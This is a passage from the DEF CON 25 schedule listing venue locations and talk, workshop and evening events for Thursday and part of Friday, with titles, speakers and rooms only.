Index of DEF CON 25 Activities


Venue Maps
Locations Legends and Info
Schedule - Thursday - Friday - Saturday - Sunday
Speaker List
Talk Title List
Talk Descriptions
DEF CON News
DEF CON 25 FAQ
DEF CON FAQ
Links to DEF CON 25 related pages


Venue Maps




Locations Legends and Info



BHV = Bio Hacking Village
     Promenade Level - Pisa room

CHV = Car Hacking Village
     Pool Level - Main Contest Area - down the escalators from Promenade South

CPV = Crypto Privacy Village
     Promenade Level - Florentine BR III

DC = DEF CON
     Emperor's Level - Track 1/101
     Emperor's Level - Track 2
     Promenade South - Track 3
     Promenade South - Track 4

DL = DemoLabs
     Promenade Level - Roman BR I & II

HHV = Hardware Hacking Village
     Pool Level - Main Contest Area - down the escalators from Promenade South

ICS = ICS Village (Industrial Control Systems)
     Pool Level - Main Contest Area - down the escalators from Promenade South

IOT = IOT Village (Internet of Things)
     Pool Level - Main Contest Area - down the escalators from Promenade South

RCV = Reconnaissance Village
     Promenade Level - Palermo

SEV = Social Engineering
     Emperor's Level - Emperors Ballroom II

SKY = Skytalks
     Promenade Level - Verona/Tuin/Trevi

VMHV = Voting Machine Hacking Village
     Promenade Level - Roman 1

PHV, PHW = Wall of Sheep / Packet Hacking Village and Workshops
     Promenade Level - Neopolitan Ballroom & Milano VIII (right behind the Vendor Area)

WS = Workshops
     Octavius BR 1 = Promenade South
     Octavius BR 2 = Promenade South
     Octavius BR 3 = Promenade South
     Octavius BR 4 = Promenade South
     Octavius BR 5 = Promenade South

WV = Wireless Village
     Promenade Level - Florentine BR I & II

Talk/Event Schedule


 

Thursday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Thursday - 10:00


Return to Index  -  Locations Legend
DC - Track 1 - There's no place like 127.0.0.1 - Achieving reliable DNS rebinding in modern browsers - Luke Young
DC - Track 2 - Where are the SDN Security Talks? - Jon Medina
WS - Octavius 1 - (10:30-14:30) - A B C of Hunting - Julian Dana
WS - Octavius 4 - (10:30-14:30) - Attacking Active Directory and Advanced Methods of Defense - Adam Steed, Andrew Allen
WS - Octavius 5 - (10:30-14:30) - Building Application Security Automation with Python - Abhay Bhargav
WS - Octavius 6 - (10:30-14:30) - Introduction to Cryptographic Attacks - Matt Cheung
WS - Octavius 7 - (10:30-14:30) - Build your stack with Scapy, for fun and profit - stryngs, Jack64, zero-x

 

Thursday - 11:00


DC - Track 1 - From Box to Backdoor: Using Old School Tools and Techniques to Discover Backdoors in Modern Devices - Patrick DeSantis
DC - Track 2 - Opt Out or Deauth Trying! - Anti-Tracking Bots, Radios and Keystroke Injection - Weston Hecker
WS - Octavius 1 - cont...(10:30-14:30) - A B C of Hunting - Julian Dana
WS - Octavius 4 - cont...(10:30-14:30) - Attacking Active Directory and Advanced Methods of Defense - Adam Steed, Andrew Allen
WS - Octavius 5 - cont...(10:30-14:30) - Building Application Security Automation with Python - Abhay Bhargav
WS - Octavius 6 - cont...(10:30-14:30) - Introduction to Cryptographic Attacks - Matt Cheung
WS - Octavius 7 - cont...(10:30-14:30) - Build your stack with Scapy, for fun and profit - stryngs, Jack64, zero-x

 

Thursday - 12:00


BillW - Office 4A on Promenade Level - Friends of Bill W -
DC - Track 1 - Porosity: A Decompiler For Blockchain-Based Smart Contracts Bytecode - Matt Suiche
DC - Track 2 - Jailbreaking Apple Watch - Max Bazaliy
WS - Octavius 1 - cont...(10:30-14:30) - A B C of Hunting - Julian Dana
WS - Octavius 4 - cont...(10:30-14:30) - Attacking Active Directory and Advanced Methods of Defense - Adam Steed, Andrew Allen
WS - Octavius 5 - cont...(10:30-14:30) - Building Application Security Automation with Python - Abhay Bhargav
WS - Octavius 6 - cont...(10:30-14:30) - Introduction to Cryptographic Attacks - Matt Cheung
WS - Octavius 7 - cont...(10:30-14:30) - Build your stack with Scapy, for fun and profit - stryngs, Jack64, zero-x

 

Thursday - 13:00


DC - Track 1 - Amateur Digital Archeology - Matt 'openfly' Joyce
DC - Track 2 - Wiping out CSRF - Joe Rozner
WS - Octavius 1 - cont...(10:30-14:30) - A B C of Hunting - Julian Dana
WS - Octavius 4 - cont...(10:30-14:30) - Attacking Active Directory and Advanced Methods of Defense - Adam Steed, Andrew Allen
WS - Octavius 5 - cont...(10:30-14:30) - Building Application Security Automation with Python - Abhay Bhargav
WS - Octavius 6 - cont...(10:30-14:30) - Introduction to Cryptographic Attacks - Matt Cheung
WS - Octavius 7 - cont...(10:30-14:30) - Build your stack with Scapy, for fun and profit - stryngs, Jack64, zero-x

 

Thursday - 14:00


DC - Track 1 - Hacking the Cloud - Gerald Steere, Sean Metcalf
DC - Track 2 - See no evil, hear no evil: Hacking invisibly and silently with light and sound - Matt Wixey
WS - Octavius 1 - cont...(10:30-14:30) - A B C of Hunting - Julian Dana
WS - Octavius 1 - (14:30-18:30) - Malware Triage: Malscripts Are The New Exploit Kit - Sergei Frankoff, Sean Wilson
WS - Octavius 4 - cont...(10:30-14:30) - Attacking Active Directory and Advanced Methods of Defense - Adam Steed, Andrew Allen
WS - Octavius 4 - (14:30-18:30) - Brainwashing Embedded Systems - Craig Young, Lane Thames, Jiva
WS - Octavius 5 - cont...(10:30-14:30) - Building Application Security Automation with Python - Abhay Bhargav
WS - Octavius 5 - (14:30-18:30) - Attacking and Defending 802.11ac Networks - Vivek Ramachandran, Thomas d'Otreppe
WS - Octavius 6 - cont...(10:30-14:30) - Introduction to Cryptographic Attacks - Matt Cheung
WS - Octavius 6 - (14:30-18:30) - Introduction to Practical Network Signature Development for Open Source IDS - Jack Mott, Jason Williams
WS - Octavius 7 - cont...(10:30-14:30) - Build your stack with Scapy, for fun and profit - stryngs, Jack64, zero-x
WS - Octavius 7 - (14:30-18:30) - SDR Crash Course: Hacking your way to fun and profit - Neel Pandeya, Nate Temple

 

Thursday - 15:00


DC - Track 1 - Inside the "Meet Desai" Attack: Defending Distributed Targets from Distributed Attacks - CINCVolFLT (Trey Forgety)
DC - Track 2 - Real-time RFID Cloning in the Field - Dennis Maldonado
DC - Track 2 - (15:20-15:40) - Exploiting 0ld Mag-stripe information with New technology - Salvador Mendoza
WS - Octavius 1 - cont...(14:30-18:30) - Malware Triage: Malscripts Are The New Exploit Kit - Sergei Frankoff, Sean Wilson
WS - Octavius 4 - cont...(14:30-18:30) - Brainwashing Embedded Systems - Craig Young, Lane Thames, Jiva
WS - Octavius 5 - cont...(14:30-18:30) - Attacking and Defending 802.11ac Networks - Vivek Ramachandran, Thomas d'Otreppe
WS - Octavius 6 - cont...(14:30-18:30) - Introduction to Practical Network Signature Development for Open Source IDS - Jack Mott, Jason Williams
WS - Octavius 7 - cont...(14:30-18:30) - SDR Crash Course: Hacking your way to fun and profit - Neel Pandeya, Nate Temple

 

Thursday - 16:00


DC - Track 1 - DEF CON 101 Panel - HighWiz, Malware Unicorn, Niki7a, Roamer, Wiseacre, Shaggy
DC - Track 2 - The Last CTF Talk You'll Ever Need: AMA with 20 years of DEF CON Capture-the-Flag organizers - Vulc@n, Hawaii John, Chris Eagle, Invisigoth, Caezar, Myles
Night Life - Sunset Park Pavilion F - DEFCON Toxic BBQ -
WS - Octavius 1 - cont...(14:30-18:30) - Malware Triage: Malscripts Are The New Exploit Kit - Sergei Frankoff, Sean Wilson
WS - Octavius 4 - cont...(14:30-18:30) - Brainwashing Embedded Systems - Craig Young, Lane Thames, Jiva
WS - Octavius 5 - cont...(14:30-18:30) - Attacking and Defending 802.11ac Networks - Vivek Ramachandran, Thomas d'Otreppe
WS - Octavius 6 - cont...(14:30-18:30) - Introduction to Practical Network Signature Development for Open Source IDS - Jack Mott, Jason Williams
WS - Octavius 7 - cont...(14:30-18:30) - SDR Crash Course: Hacking your way to fun and profit - Neel Pandeya, Nate Temple

 

Thursday - 17:00


BillW - Office 4A on Promenade Level - Friends of Bill W -
DC - Track 1 - cont...(16:00-17:45) - DEF CON 101 Panel - HighWiz, Malware Unicorn, Niki7a, Roamer, Wiseacre, Shaggy
DC - Track 2 - cont...(16:00-17:45) - The Last CTF Talk You'll Ever Need: AMA with 20 years of DEF CON Capture-the-Flag organizers - Vulc@n, Hawaii John, Chris Eagle, Invisigoth, Caezar, Myles
Night Life - Sunset Park Pavilion F - cont...(16:00-22:00) - DEFCON Toxic BBQ -
WS - Octavius 1 - cont...(14:30-18:30) - Malware Triage: Malscripts Are The New Exploit Kit - Sergei Frankoff, Sean Wilson
WS - Octavius 4 - cont...(14:30-18:30) - Brainwashing Embedded Systems - Craig Young, Lane Thames, Jiva
WS - Octavius 5 - cont...(14:30-18:30) - Attacking and Defending 802.11ac Networks - Vivek Ramachandran, Thomas d'Otreppe
WS - Octavius 6 - cont...(14:30-18:30) - Introduction to Practical Network Signature Development for Open Source IDS - Jack Mott, Jason Williams
WS - Octavius 7 - cont...(14:30-18:30) - SDR Crash Course: Hacking your way to fun and profit - Neel Pandeya, Nate Temple

 

Thursday - 18:00


Night Life - Sunset Park Pavilion F - cont...(16:00-22:00) - DEFCON Toxic BBQ -
Night Life - Track 4 - (18:30-20:30) - n00b Party hosted by Duo Security. - Duo Security
WS - Octavius 1 - cont...(14:30-18:30) - Malware Triage: Malscripts Are The New Exploit Kit - Sergei Frankoff, Sean Wilson
WS - Octavius 4 - cont...(14:30-18:30) - Brainwashing Embedded Systems - Craig Young, Lane Thames, Jiva
WS - Octavius 5 - cont...(14:30-18:30) - Attacking and Defending 802.11ac Networks - Vivek Ramachandran, Thomas d'Otreppe
WS - Octavius 6 - cont...(14:30-18:30) - Introduction to Practical Network Signature Development for Open Source IDS - Jack Mott, Jason Williams
WS - Octavius 7 - cont...(14:30-18:30) - SDR Crash Course: Hacking your way to fun and profit - Neel Pandeya, Nate Temple

 

Thursday - 19:00


Night Life - Sunset Park Pavilion F - cont...(16:00-22:00) - DEFCON Toxic BBQ -
Night Life - Track 4 - cont...(18:30-20:30) - n00b Party hosted by Duo Security. - Duo Security

 

Thursday - 20:00


Night Life - Sunset Park Pavilion F - cont...(16:00-22:00) - DEFCON Toxic BBQ -
Night Life - Track 3 - (20:30-24:00) - DEF CON Movie Night -
Night Life - Track 4 - cont...(18:30-20:30) - n00b Party hosted by Duo Security. - Duo Security

 

Thursday - 21:00


Night Life - Sunset Park Pavilion F - cont...(16:00-22:00) - DEFCON Toxic BBQ -
Night Life - Track 1 - Official DEF CON Welcome Party -
Night Life - Track 1 & Chillout lounges - Official Entertainment: DJDEAD -
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night

 

Thursday - 22:00


Night Life - Track 1 - cont...(21:00-27:00) - Official DEF CON Welcome Party
Night Life - Track 1 & Chillout lounges - Official Entertainment: SKITTISH AND BUS -
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night

 

Thursday - 23:00


Night Life - Track 1 - cont...(21:00-27:00) - Official DEF CON Welcome Party
Night Life - Track 1 & Chillout lounges - Official Entertainment: ACID T -
Night Life - Track 3 - cont...(20:30-24:00) - DEF CON Movie Night

 

Thursday - 24:00


Night Life - Track 1 - cont...(21:00-27:00) - Official DEF CON Welcome Party
Night Life - Track 1 & Chillout lounges - Official Entertainment: REID SPEED -

 

Thursday - 25:00


Night Life - Track 1 - cont...(21:00-27:00) - Official DEF CON Welcome Party
Night Life - Track 1 & Chillout lounges - Official Entertainment: NINJULA -

 

Thursday - 26:00


Night Life - Track 1 - cont...(21:00-27:00) - Official DEF CON Welcome Party
Night Life - Track 1 & Chillout lounges - Official Entertainment: SCOTCH AND BUBBLES -

 

Friday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Friday - 09:00


SKY - Verona/Tuin/Trevi - Promenade Level - (09:30-09:59) - One-click Browser Defense - Brandon Dixon

 

Friday - 10:00


BHV - Pisa Room - Biohacking: The Moral Imperative to Build a Better You - Tim Cannon
BHV - Pisa Room - (10:30-10:59) - The Patient as CEO - Robin Farmanfarmaian
CHV - Village Talks Outside Contest Area, Pool Level - Attacking Wireless Interfaces in Vehicles - Justin Montalbano, Bryan Gillispie
CPV - Florentine Ballroom 4 - (10:30-11:00) - Hacking on Multiparty Computation - Matt Cheung
DC - Track 1 - macOS/iOS Kernel Debugging and Heap Feng Shui - Min(Spark) Zheng, Xiangyu Liu
DC - Track 1 - (10:20-10:40) - Offensive Malware Analysis: Dissecting OSX/FruitFly via a Custom C&C Server - Patrick Wardle
DC - Track 2 - Welcome to DEF CON 25 - The Dark Tangent
DC - Track 2 - (10:20-10:40) - Hacking travel routers like it's 1999 - Mikhail Sosonkin
DC - Track 3 - The Brain's Last Stand - Garry Kasparov
DC - Track 4 - Secret Tools: Learning about Government Surveillance Software You Can't Ever See - Peyton "Foofus" Engel
DC - Track 4 - (10:20-11:35) - Panel: Meet The Feds - Andrea Matwyshyn, Terrell McSweeny, Dr. Suzanne Schwartz, Leonard Bailey, Lisa Wiswell
ICS - ICS-Village - (10:30-10:45) - Welcome to the ICS Village - Larry Vandenaweele
IOT - Main Contest Area - Inside the Alaris Infusion Pump, not too much medication por favor! - Dan Regalado @Danuxx
PHV - Milano VIII - Promenade Level - How Hackers Changed The Security Industry - Chris Wysopal
SKY - Verona/Tuin/Trevi - Promenade Level - Financial Crime 2.0 - Marcelo Mansur
VMHV - Roman 1, Promenade Level - Verified Voting - Barbara Simons, David Jefferson
WS - Octavius 1 - (10:30-14:30) - Linux Lockdown: ModSecurity and AppArmor - Jay Beale
WS - Octavius 4 - (10:30-14:30) - Scanning the Airwaves: building a cheap trunked radio/pager scanning system - Richard Henderson, Bryan Passifiume
WS - Octavius 5 - (10:30-14:30) - Introduction to x86 disassembly - DazzleCatDuo
WS - Octavius 6 - (10:30-14:30) - Mobile App Attack 2.0 - Sneha Rajguru
WS - Octavius 7 - (10:30-14:30) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick, Syler Clayton, Chris Castellano

 

Friday - 11:00


BHV - Pisa Room - Psychoactive Chemicals in Combat - Amanda Plimpton/Evan Anderson
BHV - Pisa Room - (11:30-11:59) - My dog is a hacker and will steal your data! - Rafael Fontes Souza
CPV - Florentine Ballroom 3 - (11:30-12:00) - WS: Mansion Apartment Shack House: How To Explain Crypto To Practically Anyone - Tarah Wheeler
CPV - Florentine Ballroom 4 - SHA-3 vs the world - David Wong
DC - Track 1 - Rage Against the Weaponized AI Propaganda Machine - Suggy (AKA Chris Sumner)
DC - Track 2 - Weaponizing the BBC Micro:Bit - Damien "virtualabs" Cauquil
DC - Track 3 - Hacking Smart Contracts - Konstantinos Karagiannis
DC - Track 4 - cont...(10:20-11:35) - Panel: Meet The Feds - Andrea Matwyshyn, Terrell McSweeny, Dr. Suzanne Schwartz, Leonard Bailey, Lisa Wiswell
HHV - Main Contest Area, Pool Level - Workshop: Component Desoldering and Recovery -
ICS - Calibria - Fun with Modbus function code 90. - Arnaud Soullie
ICS - ICS-Village - (11:30-11:59) - Introduction to the ICS Wall - Tom Van Norman
PHV - Milano VIII - Promenade Level - When the Current Ransomware and Payload of the Day (CRAP of the day) Hits the Fan: Breaking the Bad News - Catherine J. Ullman, Chris Roberts
PHW - Neopolitan BR IV - Promenade Level - An Intro to Hunting with Splunk - Splunk
SKY - Verona/Tuin/Trevi - Promenade Level - Neutrality? We don't need no stinkin' Neutrality - Munin
VMHV - Roman 1, Promenade Level - Introduction into hacking the equipment in the village. - Sandy Clark, Harri Hurst, Matt Blaze
WV - Florentine BR I & II - Promenade Level - (11:30-11:55) - Automating Physical Home Security Through Hacking - Eric Escobar
WS - Octavius 1 - cont...(10:30-14:30) - Linux Lockdown: ModSecurity and AppArmor - Jay Beale
WS - Octavius 4 - cont...(10:30-14:30) - Scanning the Airwaves: building a cheap trunked radio/pager scanning system - Richard Henderson, Bryan Passifiume
WS - Octavius 5 - cont...(10:30-14:30) - Introduction to x86 disassembly - DazzleCatDuo
WS - Octavius 6 - cont...(10:30-14:30) - Mobile App Attack 2.0 - Sneha Rajguru
WS - Octavius 7 - cont...(10:30-14:30) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick, Syler Clayton, Chris Castellano

 

Friday - 12:00


BHV - Pisa Room - The Bitcoin DNA Challenge - Keoni Gandall
BillW - Office 4A on Promenade Level - Friends of Bill W -
CHV - Village Talks Outside Contest Area, Pool Level - Autosar SecOC – Secure On-Board Comms - Jeff Quesnelle
CPV - Florentine Ballroom 3 - WS: Breaking the Uber Badge Ciphers - Kevin Hulin
CPV - Florentine Ballroom 4 - Alice and Bob are Slightly Less Confused - David Huerta
DC - Track 1 - CITL and the Digital Standard - A Year Later - Sarah Zatko
DC - Track 2 - Open Source Safe Cracking Robots - Combinations Under 1 Hour! (Is it bait? Damn straight it is.) - Nathan Seidle
DC - Track 3 - A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! - Orange Tsai
DC - Track 4 - Hacking Democracy: A Socratic Dialogue - Mr. Sean Kanuck
PHV - Milano VIII - Promenade Level - Iron Sights for Your Data - Leah Figueroa
PHW - Neopolitan BR IV - Promenade Level - cont...(11:00-12:30) - An Intro to Hunting with Splunk - Splunk
SKY - Verona/Tuin/Trevi - Promenade Level - Gun control - You can't put the Genie back into its bottle - Michael E. Taylor, Attorney at Law
VMHV - Roman 1, Promenade Level - Session on legal considerations of hacking election machines. - Joseph Hall, Candice Hoke
WV - Florentine BR I & II - Promenade Level - Hacking Some More of The Wireless World - Balint Seeber
WS - Octavius 1 - cont...(10:30-14:30) - Linux Lockdown: ModSecurity and AppArmor - Jay Beale
WS - Octavius 4 - cont...(10:30-14:30) - Scanning the Airwaves: building a cheap trunked radio/pager scanning system - Richard Henderson, Bryan Passifiume
WS - Octavius 5 - cont...(10:30-14:30) - Introduction to x86 disassembly - DazzleCatDuo
WS - Octavius 6 - cont...(10:30-14:30) - Mobile App Attack 2.0 - Sneha Rajguru
WS - Octavius 7 - cont...(10:30-14:30) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick, Syler Clayton, Chris Castellano

 

Friday - 13:00


BHV - Pisa Room - Tales from a healthcare hacker - Kevin Sacco
BHV - Pisa Room - (13:30-13:59) - Implants: Show and Tell - c00p3r
CHV - Village Talks Outside Contest Area, Pool Level - (13:30-14:30) - Grand Theft Radio (Stopping SDR Relay Attacks on PKES) - Weston Hecker
CPV - Florentine Ballroom 3 - WS: FeatherDuster and Cryptanalib workshop - Daniel Crowley
CPV - Florentine Ballroom 4 - Protecting Users' Privacy in a Location-Critical Enterprise: The Challenges of 9-1-1 Location - Trey Forgety
DC - Track 1 - Controlling IoT devices with crafted radio signals - Caleb Madrigal
DC - Track 2 - Teaching Old Shellcode New Tricks - Josh Pitts
DC - Track 3 - Starting the Avalanche: Application DoS In Microservice Architectures - Scott Behrens, Jeremy Heffner
DC - Track 4 - Next-Generation Tor Onion Services - Roger Dingledine
HHV - Main Contest Area, Pool Level - Robo-Sumo -
ICS - Calibria - What's the DFIRence for ICS? - Chris Sistrunk
IOT - Main Contest Area - Hide Yo Keys, Hide Yo Car - Remotely Exploiting Connected Vehicle APIs and Apps - Aaron Guzman @scriptingxss
PHV - Milano VIII - Promenade Level - CVE IDs and How to Get Them - Daniel Adinolfi, Anthony Singleton
PHW - Neopolitan BR IV - Promenade Level - Reverse Engineering Malware 101 - Malware Unicorn
SKY - Verona/Tuin/Trevi - Promenade Level - From OPSUCK to OPSEXY: An OPSEC Primer - H0m3l3ss, Steve Pordon, and minion
VMHV - Roman 1, Promenade Level - Brief history of election machine hacking and lessons learned so far and why it is hard to tell the difference between incompetence and malice. - Harri Hurst
WV - Florentine BR I & II - Promenade Level - cont...(12:00-13:25) - Hacking Some More of The Wireless World - Balint Seeber
WV - Florentine BR I & II - Promenade Level - (13:30-13:55) - Wireless Threat Modeling and Monitoring - WiNT - BASIM ALTINOK
WS - Octavius 1 - cont...(10:30-14:30) - Linux Lockdown: ModSecurity and AppArmor - Jay Beale
WS - Octavius 4 - cont...(10:30-14:30) - Scanning the Airwaves: building a cheap trunked radio/pager scanning system - Richard Henderson, Bryan Passifiume
WS - Octavius 5 - cont...(10:30-14:30) - Introduction to x86 disassembly - DazzleCatDuo
WS - Octavius 6 - cont...(10:30-14:30) - Mobile App Attack 2.0 - Sneha Rajguru
WS - Octavius 7 - cont...(10:30-14:30) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick, Syler Clayton, Chris Castellano

 

Friday - 14:00


BHV - Pisa Room - Sensory Augmentation 101 - Trevor Goodman
BHV - Pisa Room - (14:30-14:59) - Health as a service... - Julian Dana
CHV - Village Talks Outside Contest Area, Pool Level - cont...(13:30-14:30) - Grand Theft Radio (Stopping SDR Relay Attacks on PKES) - Weston Hecker
CHV - Village Talks Outside Contest Area, Pool Level - (14:30-15:30) - Abusing Smart Cars with QR codes - Vlad Gostomelsky
CPV - Florentine Ballroom 4 - Breaking TLS: A Year in Incremental Privacy Improvements - Andrew Brandt
DC - Track 1 - Using GPS Spoofing to control time - David "Karit" Robinson
DC - Track 2 - Death By 1000 Installers; on macOS, it's all broken! - Patrick Wardle
DC - Track 3 - Breaking the x86 Instruction Set - Christopher Domas
DC - Track 4 - How we created the first SHA-1 collision and what it means for hash security - Elie Bursztein
HHV - Main Contest Area, Pool Level - cont...(13:00-15:00) - Robo-Sumo -
ICS - Octavius 6 - (14:30-18:30) - Industrial Control System Security 101 and 201 - SOLD OUT - Matthew E. Luallen, Nadav Erez
IOT - Main Contest Area - (14:40-15:30) - Pwning the Industrial IoT: RCEs and backdoors are around! - Vladimir Dashchenko @raka_baraka & Sergey Temnikov
PHV - Milano VIII - Promenade Level - You're Going to Connect to the Wrong Domain - Sam Erb
PHV - Milano VIII - Promenade Level - (14:40-14:59) - XSS FTW - What Can Really Be Done With Cross-Site Scripting - Brute Logic
PHW - Neopolitan BR IV - Promenade Level - cont...(13:00-14:30) - Reverse Engineering Malware 101 - Malware Unicorn
RCV - Palermo room, Promenade level - (14:20-14:55) - It’s Going To Get Worse Before It Gets Better - The Future of Recon Data Mining - Shane McDougal
RCV - Palermo room, Promenade level - (14:55-15:40) - An Introduction to Graph Theory for OSINT - Andrew Hay
SKY - Verona/Tuin/Trevi - Promenade Level - Advanced DNS Exfil - Nolan and Cory
VMHV - Roman 1, Promenade Level - What are the national security implications of cyber attacks on our voting systems? What are the motivations of our adversaries, and how should the U.S. respond to the threat? - General Douglas Lute
WS - Octavius 1 - cont...(10:30-14:30) - Linux Lockdown: ModSecurity and AppArmor - Jay Beale
WS - Octavius 1 - (14:30-18:30) - Penetration Testing in Hostile Environments: Client & Tester Security - Wesley McGrew, Brad Pierce
WS - Octavius 4 - cont...(10:30-14:30) - Scanning the Airwaves: building a cheap trunked radio/pager scanning system - Richard Henderson, Bryan Passifiume
WS - Octavius 4 - (14:30-18:30) - Windows - The Undiscovered country - Chuck Easttom
WS - Octavius 5 - cont...(10:30-14:30) - Introduction to x86 disassembly - DazzleCatDuo
WS - Octavius 5 - (14:30-18:30) - Subverting Privacy Exploitation Using HTTP - Eijah
WS - Octavius 6 - cont...(10:30-14:30) - Mobile App Attack 2.0 - Sneha Rajguru
WS - Octavius 6 - (14:30-18:30) - Industrial Control System Security 101 and 201 - Matthew E. Luallen, Nadav Erez
WS - Octavius 7 - cont...(10:30-14:30) - Applied Physical Attacks on Embedded Systems, Introductory Version - Joe FitzPatrick, Syler Clayton, Chris Castellano
WS - Octavius 7 - (14:30-18:30) - Advanced Wireless Attacks Against Enterprise Networks - Gabriel Ryan

 

Friday - 15:00


BHV - Pisa Room - Computational Chemistry on a Budget - Mr. Br!ml3y
BHV - Pisa Room - (15:30-15:59) - Trigraph: An Ethereum-based Teleradiology Application - Ryan Schmoll and Peter Hefley
CHV - Village Talks Outside Contest Area, Pool Level - cont...(14:30-15:30) - Abusing Smart Cars with QR codes - Vlad Gostomelsky
CPV - Florentine Ballroom 3 - WS: NoiseSocket: Extending Noise to Make Every TCP Connection Secure - Dmitry Dain, Alexey Ermishkin
CPV - Florentine Ballroom 4 - A New Political Era: Time to start wearing tin-foil hats following the 2016 elections? - Joel Wallenstrom, Robby Mook
DC - Track 1 - Assembly Language is Too High Level - XlogicX
DC - Track 2 - Phone system testing and other fun tricks - "Snide" Owen
DC - Track 3 - Dark Data - Svea Eckert, Andreas Dewes
DC - Track 4 - Abusing Certificate Transparency Logs - Hanno Böck
ICS - Calibria - (15:30-15:59) - How to create dark buildings with light speed. - Thomas Brandstetter
ICS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - SOLD OUT - Matthew E. Luallen, Nadav Erez
IOT - Main Contest Area - cont...(14:40-15:30) - Pwning the Industrial IoT: RCEs and backdoors are around! - Vladimir Dashchenko @raka_baraka & Sergey Temnikov
Night Life - The Nobu Hotel in Caesars Palace - Women, Wisdom & Wine - IOActive
PHV - Milano VIII - Promenade Level - IP Spoofing - Marek Majkowski
PHW - Neopolitan BR IV - Promenade Level - Serious Intro to Python for Admins - Davin Potts
RCV - Palermo room, Promenade level - cont...(14:55-15:40) - An Introduction to Graph Theory for OSINT - Andrew Hay
RCV - Palermo room, Promenade level - (15:40-16:25) - Into the Bird’s Nest: A Comprehensive Look at Twitter as a Research Tool - Tracy Z. Maleeff
SKY - Verona/Tuin/Trevi - Promenade Level - Death Numbers in Surgical room, Attacking Anesthesia Equipment. - Michael Hudson
VMHV - Roman 1, Promenade Level - Common misconceptions and false parallels about voting technology. We can do online banking and use ATMs, why can't we vote on touch screens or online? - Joseph Hall
WV - Florentine BR I & II - Promenade Level - Deceptacon: Wi-Fi Deception in under $5 - Vivek Ramachandran and Nishant Sharma and Ashish Bangale
WS - Octavius 1 - cont...(14:30-18:30) - Penetration Testing in Hostile Environments: Client & Tester Security - Wesley McGrew, Brad Pierce
WS - Octavius 4 - cont...(14:30-18:30) - Windows - The Undiscovered country - Chuck Easttom
WS - Octavius 5 - cont...(14:30-18:30) - Subverting Privacy Exploitation Using HTTP - Eijah
WS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - Matthew E. Luallen, Nadav Erez
WS - Octavius 7 - cont...(14:30-18:30) - Advanced Wireless Attacks Against Enterprise Networks - Gabriel Ryan

 

Friday - 16:00


BHV - Pisa Room - Blockchain's Role in the Disruption of the Medical Industry - John Bass
BHV - Pisa Room - (16:30-16:59) - Neurogenic Peptides: Smart Drugs 4-Minute Mile - Gingerbread
CHV - Village Talks Outside Contest Area, Pool Level - DefCon Unofficial Badges Panel - #BadgeLife Badge Makers
CPV - Florentine Ballroom 3 - Underhanded Crypto Announcement
CPV - Florentine Ballroom 4 - Security Analysis of the Telegram IM - Tomas Susanka
CPV - Florentine Ballroom 4 - (16:30-17:30) - Cryptanalysis in the Time of Ransomware - Mark Mager
DC - Track 1 - Radio Exploitation 101: Characterizing, Contextualizing, and Applying Wireless Attack Methods - Matt Knight, Marc Newlin
DC - Track 2 - The Adventures of AV and the Leaky Sandbox - Itzik Kotler, Amit Klein
DC - Track 3 - An ACE Up the Sleeve: Designing Active Directory DACL Backdoors - Andy Robbins, Will Schroeder
DC - Track 4 - "Tick, Tick, Tick. Boom! You're Dead." — Tech & the FTC - Whitney Merrill, Terrell McSweeny
HHV - Main Contest Area, Pool Level - Workshop: Component Desoldering and Recovery -
ICS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - SOLD OUT - Matthew E. Luallen, Nadav Erez
IOT - Main Contest Area - IoT - the gift that keeps on giving - Alex "Jay" Balan @Jaymzu
Night Life - The Nobu Hotel in Caesars Palace - cont...(15:00-17:00) - Women, Wisdom & Wine - IOActive
PHV - Milano VIII - Promenade Level - Layer 8 and Why People are the Most Important Security Tool - Damon Small
PHW - Neopolitan BR IV - Promenade Level - cont...(15:00-16:30) - Serious Intro to Python for Admins - Davin Potts
RCV - Palermo room, Promenade level - cont...(15:40-16:25) - Into the Bird’s Nest: A Comprehensive Look at Twitter as a Research Tool - Tracy Z. Maleeff
RCV - Palermo room, Promenade level - (16:25-16:45) - Up close and personal - Keeping an eye on mobile applications - Mikhail Sosonkin
SEV - Emperors BR II - Thematic Social Engineering - Robert Wood
SEV - Emperors BR II - (16:55-17:25) - Beyond Phishing - Building and Sustaining a Corporate SE Program - Fahey Owens
SKY - Verona/Tuin/Trevi - Promenade Level - All The Sales President's Men - Patrick McNeil
VMHV - Roman 1, Promenade Level - How did we get here: A history of voting technology, hanging chads, and the Help America Vote Act. This segment will feature a punch card machine and demo what can go wrong with it. - Matt Blaze
WV - Florentine BR I & II - Promenade Level - Designing an Automatic Gain Control - Robert Ghilduta
WS - Octavius 1 - cont...(14:30-18:30) - Penetration Testing in Hostile Environments: Client & Tester Security - Wesley McGrew, Brad Pierce
WS - Octavius 4 - cont...(14:30-18:30) - Windows - The Undiscovered country - Chuck Easttom
WS - Octavius 5 - cont...(14:30-18:30) - Subverting Privacy Exploitation Using HTTP - Eijah
WS - Octavius 6 - cont...(14:30-18:30) - Industrial Control System Security 101 and 201 - Matthew E. Luallen, Nadav Erez
WS - Octavius 7 - cont...(14:30-18:30) - Advanced Wireless Attacks Against Enterprise Networks - Gabriel Ryan

 

Friday - 17:00


BHV - Pisa Room - Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science - David Bach
BHV - Pisa Room - (17:30-17:59) - Human-Human Interface - Charles Tritt
BillW - Office 4A on Promenade Level - Friends of Bill W -
CHV - Village Talks Outside Contest Area, Pool Level - Turbo Talks – Getting Started With CarHacking, k-Line Hacking - Jerry Gamblin
CPV - Florentine Ballroom 3 - WS: Supersingular Isogeny Diffie-Hellman - Deirdre Connolly
CPV - Florentine Ballroom 4 - cont...(16:30-17:30) - Cryptanalysis in the Time of Ransomware - Mark Mager
CPV - Florentine Ballroom 4 - (17:30-18:30) - Unfairplay (NOT RECORDED) - [anonymous panel]
